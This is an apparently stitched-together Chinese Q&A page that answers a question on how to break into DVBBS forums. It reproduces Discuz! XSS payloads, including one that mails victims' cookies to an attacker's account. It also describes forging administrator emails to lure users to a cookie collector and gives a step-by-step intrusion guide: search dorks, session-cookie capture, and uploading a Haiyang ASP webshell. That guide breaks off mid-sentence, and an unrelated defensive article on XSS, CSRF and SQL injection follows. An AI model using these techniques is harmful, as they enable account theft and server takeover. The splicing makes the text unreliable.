目前动网论坛的漏洞有那些？如何利用这些漏洞入侵动网？

在discuz！的发贴、回贴、PM等中的subject都没有经过过滤，所以也可以添加代码。 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先d出自己的cookie 利用方法：把上述代码放置到img中。 适用版本：discuz！2.x discuz！3.x 一种利用discuz！2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞，具体描述如下： XXXFan的给某个会员发送悄悄的链接如下（假定这个会员名字为XXXFan） http://XXX/pm.php?action=send&username=XXXFan 因为论坛程序对会员名字没有进行过滤，而是直接显示在发送到栏目中（TO：），所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=send&username=XXXFan "><script>alert(documents.cookie)</script><b%20" 上面的链接点击以后首先d出的是自己的cookie内容。 当然我们可以先在自己的站点上构造一个程序来收集cookie，类似于 getcookie.php?cookie= 但是如何来诱使会员点击呢，如果简单的放在论坛上，太容易被识别。所以可以利用discuz论坛程序的另外一个功能，"帖子介绍给朋友"功能。 因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版，可以伪造任何人给别人发信，安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信，诱使会员点击我们准备的URL，如果诱使就看自己的手段了，例如可以说"论坛正在测试新功能，请您协助点击上面地址，我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。 因为链接地址是XXXFan的，而且发信人和邮件地址都是XXXFan的官方地址，所以可信度非常高，而且不会留下任何把柄。当然为了更高的安全性，可以在<script>里的内容加密，以进一步增加隐蔽性。 至于得到cookie如何做，可以尝试cookie欺骗或者是暴力破解MD5密码 本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz！悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n （n为选项，从0开始） 的方式通过URL来直接投票 但是如果n>最大选项呢，嘻嘻～ 照样提交成功，不过增加了一个标题为空的选项 效果见： http://discuz.net/viewthread.php?tid=20020&sid=dymPEc （那个最后的空白的是我刚加的） 该漏洞存在的版本： Discuz!3.X Discuz!2.X(可能，没有测试过） Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的，第一发现者（PK0909)。 具体的描述就不说了，下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22)Req.open(%22post%22,%22 http://www.XXXX.com/forum/pm.php?action=send%22,false)var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie)Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22)Req.send(forms)%3c/script%3e%3cb%22 [ /img] 发现discuz！UT 跨域站点的脚本漏洞－－短消息篇有关跨域站点的脚本漏洞，已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅： http://www.cert.org/advisories/CA-2000-02.html 下面针对Discuz、UT论坛程序的悄悄话部分加以说明 漏洞适应版本： Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述： discuz！给指定会员发送悄悄话使用的是类似 http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句，但是name没有经过过滤直接显示在发送短消息的页面中，这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 http://XXX.net/pm.php?action=send&uid=XXXX 类似的语句，避免了这个漏洞，但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ，上面的例子是显示自己的cookie。（针对Discuz!1.X Discuz!2.X) http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 显示自己的cookie。（针对Discuz!3.X) UT虽然在主题上经过了过滤，也就是说把%27转换为'；但是其收件人却没有过滤，所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同，但是总的来说都有类似的漏洞）

希望采纳

论坛上传漏洞是论坛中一种很常见的漏洞。论坛源码往往由于设计失误而引发漏洞，其中允许远程用户将任意文件上传到论坛主机上的漏洞被称为论坛的上传漏洞。通过论坛上传漏洞，入侵者甚至可以完全控制远程开启论坛服务的主机。绝大部分论坛为了界面的美观与人性化都支持文件上传功能，而上传的文件有类型的限制，设计失误是指对文件类型过滤不严，比如本应只允许JPEG格式的文件上传，结果用户却可以上传ASP文件。下面以利用动网论坛（DV BBS）存在的上传漏洞的实例来说明上传漏洞的具体内容及利用方法。

1．实例

利用动网论坛上传漏洞进行入侵。

动网论坛上传漏洞的描述：动网论坛上传漏洞存在于DV BBS7.0 SP2及其更低的所有版本中，其中DV BBS7.0 SP2以前的版本可以利用工具直接上传ASP文件。

漏洞存在于基本资料修改中头像上传位置，如图4-73所示，单击“上传”按钮将调用upfile.asp文件，而upfile.asp中存在文件类型过滤不严的问题。

图4-73

漏洞利用思路：检测到漏洞后，在存在漏洞论坛中注册一个用户账号，利用这个账号获取Cookie。在本地制作网页木马文件，使用专用工具结合已获取的Cookie值将网页木马上传到远程主机中。

步骤1：搜索漏洞

漏洞的搜索可以使用百度（http://www.baidu.com）、雅虎（http://cn.search.yahoo.com/）等搜索引擎。例如，在百度中搜索“"Powered By:Dvbbs Version 7.0.0 SP1"”，如图4-74所示。

图4-74

本实例中将对一个已发现存在上传漏洞的动网论坛主机进行攻击测试，地址：http://192.168. 232.132，版本为6.1.0，如图4-75所示。

图4-75

步骤2：注册用户

本例中想利用上传漏洞需要进入用户基本资料设置页面，因此首先需要注册一个用户，这里的用户名注册为squirrel，密码为111111，登录时如图4-76所示。

图4-76

登录后，选择用户控制面板中的基本资料修改项，如图4-77所示。

图4-77

进入后，显示如图4-78所示。

图4-78

步骤3：获取Cookie

什么是Cookie

Cookie是由Internet站点创建的、将信息存储在计算机上的文件，例如访问站点时的首选项。Cookie可以存储个人可识别信息，例如姓名、电子邮件地址、家庭或工作地址，或者电话号码。一旦将Cookie保存在计算机上，则只有创建Cookie的网站才能读取。

Cookie包括永久Cookie和临时Cookie。永久Cookie以文件形式存储在计算机上，关闭Internet Explorer时仍然保留在计算机上，再次访问该站点时，创建该Cookie的网站可以读取。临时Cookie或会话Cookie仅为当前浏览的对话存储，关闭Internet Explorer时即从计算机上删除。

工具介绍

使用工具：Winsock Expert。

工具说明：目前常用的版本是Winsock Expert v0.6 beta1。Winsock Expert是用于跟踪程序执行的专用软件，可以使用这个软件来跟踪IE的执行情况，获取相关的Cookie信息。

Cookie的获取

打开Winsock Expert，如图4-79所示。

图4-79 用已注册的用户名登录到论坛，进入基本资料修改页面，如图4-80所示。

图4-80

为了获取Cookie，需要跟踪IE的执行情况，抓取数据包。回到Winsock Expert，单击图标

，在Select Process To Monitor中选择刚刚打开的页面，这里是“动网先锋论坛——基本资料修改”，如图4-81所示。

图4-81 选定好单击“Open”按钮，这时的Winsock Expert运行界面如图4-82所示。

图4-82将Winsock Expert暂时放在一边，不要对其进行其他 *** 作。在论坛的个人基本资料修改页面中单击“浏览”按钮，随便选取一个文件，如图4-83所示。

图4-83

单击“上传”按钮后显示如图4-84所示，直接上传ASP文件会被过滤掉，后边的步骤中将介绍如何利用工具上传ASP网页木马，现在只是为了得到Cookie为后边的步骤做准备。

图4-84 到这里，已经实现了抓取数据包。在Winsock Expert窗口中Packets Text栏下找到“POST 路径”项所在的行，并单击此行，在窗口下部的详细信息中即包含了需要的Cookie信息和上传处理文件的路径信息和文件名信息，如图4-85所示。本例中获得的Cookie信息为ASPSESSIONIDQGQQGUDK=NMPJMAFDNGMAJHOCNLOELOHL，上传处理文件的路径为论坛根目录，文件名为upfile.asp。

图4-85

步骤4：生成网页木马

工具介绍

使用工具：海阳顶端网ASP木马2006版。

工具说明：海阳顶端网ASP木马2006版中包含有6个文件，文件的使用说明如下。

2006.asp，海阳顶端网ASP木马2006版文件。

pack.vbs，打包文件“HYTop.mdb”的解开器。

2006X.exe，海阳顶端网ASP木马2006 C/S模式转换器。

2006X2.exe，海阳顶端网ASP木马2006专用短服务器端C/S模式转换器。

2006Z.exe，海阳顶端网ASP木马2006_Lite版本组合器，用来自定义生成相应功能的Lite版木马。

hididi.ini，2006Z.exe的配置文件。

这里使用2006Z.exe生成的网页木马文件。使用2006Z.exe的好处在于生成网页木马的功能可选，且上传后易于 *** 作。

2006Z.exe使用说明：打开程序后，可以在“页面选择”框架里选择所需要生成的Lite版海阳顶端网ASP木马功能模块，“页面生成”框架里的源文件指的是Full版的海阳顶端网ASP木马2006（本文件夹中的2006a.asp），选择好相应的源文件及生成文件后，单击“生成”按钮即可生成相应功能组合的海阳顶

随着互联网的发展，早已经不是仅限于简单的网页或是社交，电商购物、银行转账、企业管理等等。上次看到一个新闻，后台程序员离职后，利用职位之便，每天还不断的给自己转账，转了好多次才被发现，想想这多可怕。或者会窃取重要的商业信息，所以 Web 安全也是非常值得注意的。

什么是 Web 安全？

黑客利用网络 *** 作系统的漏洞和 Web 服务器的 SQL 注入漏洞等，得到 Web 服务器的控制权，轻则篡改、删除、添加数据，重则窃取重要的商业信息、转账等，更严重的就是在网页中植入恶意代码，使网站受到不可预期的侵害。

常见的攻击可分为三类：XSS、CSRF、SQL注入。

Cross Site Scripting 跨站脚本攻击，为了与 CSS 区分，所以简写为 XSS 。

恶意攻击给 Web 页面植入恶意的 Script 代码，当用户浏览该网页的时候，嵌入 Web 里面的 script 代码会被执行，从而达到攻击的效果。

讲直白点，就是恶意攻击者通过在输入框处添加恶意 script 代码，用户浏览网页的时候执行 script 代码，从而达到恶意攻击用户的目的。

1.1、XSS 的危害

1.2、XSS 的攻击类型

发出请求时，XSS代码会出现在 url 中，作为输入提交到服务器端，服务器再返回给浏览器，然后浏览器解析执行 XSS 代码，这一过程像一次反射，所以称之为反射型。

这种类型的攻击，通常是把 XSS 攻击代码放入请求地址的 数据传输部分，如：

提交的 XSS 代码会存储在服务器端，如数据库、内存、文件系统内，下次请求目标页面时不再提交 XSS 代码。

文档型的 XSS 攻击不会经过服务器，作为中间人的角色，在数据传输过程中劫持到网络数据包，然后修改里面的 html 文档。

1.3、XSS 的防御措施

措施1：编码。

对这些数据进行 html entity 编码。客户端和服务器端都需要进行转义编码。

转义后为：

放入上边的代码中，还是会自动解析为上边的代码，所以放到外边。

措施2：过滤。

移除用户上传的 DOM 属性，如上边的 onerror。

移除用户上传的 style、script、iframe 节点。

措施3：利用 CSP

浏览器中的内容安全策略，就是决策浏览器加载哪些资源。

Cross site request forgery 跨站点请求伪造。

攻击者诱导受害者进入第三方网站，向被攻击网站发送跨站请求，利用被攻击者在被攻击网站已经获取的注册凭证，绕过后台的用户验证达到冒充用户对攻击网站进行的某种 *** 作。

CSRF 攻击特点：

2.1、CSRF 的危害

2.2、CSRF 的攻击类型

使用非常简单，只需要一个 http 请求。

比如页面中的一个图片添加链接，还有 iframe、script ，最容易完成 CSFR 攻击，且不易被用户发现，隐蔽性超强。

由于 get 接口是最常见的一种 CSRF 攻击类型，所以很多重要的接口不适用 get 方式，使用 post 一定程度上可以防止 CSRF 攻击。

这种类型的 SCRF 攻击，通常使用的是一个自动提交的表单。简单讲就是伪造一个自动提交的表单，一旦访问页面时，表单就会自动提交。

如：

比起前两个，这个类型的比较少见，链接类型的攻击必须要用户点击链接，才能触发。

通常在论坛中发布的图片嵌入恶意的链接，或以广告的形式诱导用户点击中招。所以我们在邮箱中看到乱七八糟的广告，尽量别点击，防止遇到三方攻击。

伪造一种新型的攻击方式，用户误以为是在网站正常登录，实际上是使用账户和密码登录到了黑客网站，这样黑客可以监听到用户的所有 *** 作，甚至知道用户的账户信息。

2.3、CSRF 的防御措施

措施1：检查 http 头部的 referer 信息

referer 包含在请求头内，表示请求接口的页面来源。

服务端通过检查 referer 信息，发现来源于外域时，就可以拦截请求，通过阻止不明外域的访问，一定程度上可以减少攻击。

措施2：使用一次性令牌

使用一次性令牌做身份识别，黑客是无法通过跨域拿到一次性令牌的，所以服务端可以通过判断是否携带一次性令牌，就可以排除一部分的非法 *** 作者。

措施3：使用验证图片

服务端生成一些文本和数字，在服务端保存这份信息，同时以图片的形式在客户端展现，让用户去合法填写信息，当 CSRF 攻击时，拿不到这个验证码的时候，无法向服务器提供这个信息，导致匹配失败，从而识别它是非法攻击者。

这个应用非常常见，之前登录的时候，需要填写图形验证码。

现在滑动图片验证也非常常见。

SQL 注入，一般发生在注册、评论、添加等，只有有用户输入的地方，就有可能发生 SQL 注入。SQL 注入是一种常见的 Web 安全漏洞，攻击者会利用这个漏洞，可以访问或修改数据，利用潜在的数据库漏洞进行攻击。

所谓SQL注入，就是通过把SQL命令插入到Web 表单 提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将(恶意的)SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到 SQL注入式攻击 .

3.1、SQL 注入危害

任意的账号都可以登录，可以进行任意的 *** 作，粗暴点讲，就是随便来。

3.2、 SQL注入分类

当输入的参数为整数时，则有可能存在数字型漏洞。

当输入参数为字符串时，则可能存在字符型注入漏洞。数字型与字符型注入最大的区别在于：数字型不需要单引号闭合，而字符型一般需要使用单引号来闭合。

字符型注入最关键的是如何闭合 SQL 语句以及注释多余的代码。

其实我觉得 SQL 注入只有两种类型：数字型与字符型。很多人可能会说还有如：Cookie 注入、POST 注入、延时注入等。

的确如此，但这些类型的注入归根结底也是数字型和字符型注入的不同展现形式或者注入的位置不同罢了。

以下是一些常见的注入叫法：

3.3、SQL注入的防范措施

凡是用户输入的地方，我们都应该防止黑客攻击，永远不要相信用户的输入。所以对应的防御措施分别有：

前后端分离之后，前端每天都会接触到很多接口。发送网络请求的时候，有些接口就会使用 get 方法。最常见的传参方式就是，直接在 url 地址后面加参数。

直接采用这种方式传输数据，如果数据被劫持或抓包工具偷走之后，就会直接被人盗取走，特别危险。若是采用接口加密，如下：

上边那个看不懂的一长串符号，正是经过加密的数据。

接口加密就是将接口请求调用中传递的参数进行加密，目的就是为了保证接口请求中传递参数和返回的结果的安全性，一般比较敏感数据，如身份z、电话号码、账号、密码等需要进行加密。

常见的加密方式：

加密方式较多，可以根据自己具体的需要和项目语言选择其中一种。

加密之后的数据更安全，那我们能不能将接口所有的数据都进行加密呢？加密是非常消耗资源的，如果有大批量的数据都进行加密时，返回数据需要的时间就更长，会直接影响用户体验。所以我们进行加密时，只需要对敏感的重要的信息进行加密。

好了我今天的文章就到此结束了，本篇文章没有介绍到的 web 安全，欢迎评论区交流！

---